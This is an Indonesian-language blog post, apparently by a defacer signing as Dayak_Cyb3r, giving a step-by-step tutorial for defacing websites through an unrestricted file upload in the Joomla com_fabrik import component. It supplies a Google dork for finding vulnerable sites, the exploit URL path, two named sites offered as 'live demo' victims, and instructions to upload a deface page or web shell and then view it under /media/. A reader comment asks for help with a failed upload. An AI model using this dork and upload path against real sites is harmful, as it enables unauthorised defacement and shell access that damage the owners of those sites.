Deface Dengan Com_Fabrik


Langsung aja :D

1. Dork : inurl:viewTable?cid= site:.com

    Kembangin sendiri ya :)

2. Exploit : index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

    Live demo : 1. sanmigueldeabona.es
                        2. hispabano.es

3. Cari target menggunakan dork
    Misal : KLIK 

    jika ada tulisan "Sorry this from is not publiesed"





4. Masukan expolitnya : \hispabano.es/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1





5. Upload script deface kalian, atau shell jika beruntung kilk import CSV

6. Jika masih tetap dihalaman Upload kalian, berarti berhasil
    Jika dialihkan kehalaman blank putih yang hanya ada tempat upload berarti gagal
    Coba cari target lain

7. Untuk melihat hasil deface kalian, : http://targer.com/media/namafilekalian.html
    Contoh klik : hispabano.es/media/banten.html 

Sekian dan terimakasih :)


./Dayak_Cyb3r

Share on Google Plus

About Unknown

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment

1 komentar :

  1. gan kan udah di pasang scrip nya pas aku ketik
    http://webnya.com/media/namascripku.html
    kok keluarnya 404 itu udah jadi apa belom ya

    ReplyDelete

Silahkan Ber-Komentar bro.. :)
SOPAN WAJIB !!